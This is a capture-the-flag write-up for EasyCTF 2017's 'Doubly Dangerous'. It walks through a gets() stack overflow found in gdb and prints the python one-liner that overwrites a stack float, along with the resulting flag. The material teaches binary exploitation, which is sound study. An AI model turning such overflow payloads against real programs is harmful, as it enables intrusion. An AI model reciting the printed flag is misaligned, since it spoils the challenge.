CTFtime.org

Doubly Dangerous

by asdffdfsefs / phsst

Tags: binexploit 

Rating: 5.0

# Doubly Dangerous - 110 Points

There seems to be an issue with [this](https://github.com/EasyCTF/easyctf-2017-problems/blob/master/doubly-dangerous/doubly_dangerous?raw=true) binary. Can you exploit it?

### Solution

###### Writeup by VoidMercy from phsst

We were given a binary.

We first run it to see what it does

```
Give me a string:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
nope!
Segmentation fault
```

Seems like a buffer overflow because there was a segmentation fault. This means gets() was probably used, and gets() does not care about the length of the string we input. Now let's take a look at the code in gdb with

```
gdb doubly_dangerous
set disassembly-flavor intel
disas main
```

Here is the interesting instruction:

```
0x0804863c <+53>: fld DWORD PTR [ebp-0xc]
0x0804863f <+56>: fld DWORD PTR ds:0x804876c
0x08048645 <+62>: fucomip st,st(1)
```

We can see that fucomip is being used, which is floating point instructions. We surmise that we need to make this compare return true. We can see that the value at 0x804876c is being compared to the value at ebp-0xc. Because we saw a segmentation fault, we know this consists of an overflow. We experiment with the amount of bytes to type until the value at ebp-0xc is overflowed.

```
python -c "print 'A'*69" > temp

(gdb) r < temp
...
Breakpoint 1, 0x08048686 in main ()
(gdb) x/10wx $ebp-0xc
0xffffd0dc: 0x41414141 0xf7fc0041 0xffffd100 0x00000000
0xffffd0ec: 0xf7e31a83 0x08048690 0x00000000 0x00000000
0xffffd0fc: 0xf7e31a83 0x00000001
```

Alright, we can see that 69 characters overflows the content at ebp-0xc and 1 extra character. This means we need 64 characters to get the ebp-0xc, and then with the next four characters, we can control what value to place in $ebp-0xc. Now, we need to check what value to replace it with.

```
(gdb) x/10wx 0x804876c
0x804876c: 0x41348000 0x3b031b01 0x00000030 0x00000005
0x804877c: 0xfffffc60 0x0000004c 0xfffffe0b 0x00000070
0x804878c: 0xfffffe97 0x00000090
```

We can see the value we need is 0x41348000. Now we can construct our exploit.

```
python -c "print 'A'*64 + '\x00\x80\x34\x41'" | ./doubly_dangerous
```

```
python -c "print 'A'*64 + '\x00\x80\x34\x41'" | ./doubly_dangerous
Give me a string:
Success! Here is your flag:
easyctf{bofs_and_floats_are_d0uble_tr0uble!}
```

## Flag

>easyctf{bofs_and_floats_are_d0uble_tr0uble!}

Original writeup (https://github.com/VoidMercy/EasyCTF-Writeups-2017/tree/master/binexploit/Doubly%20Dangerous).

Comments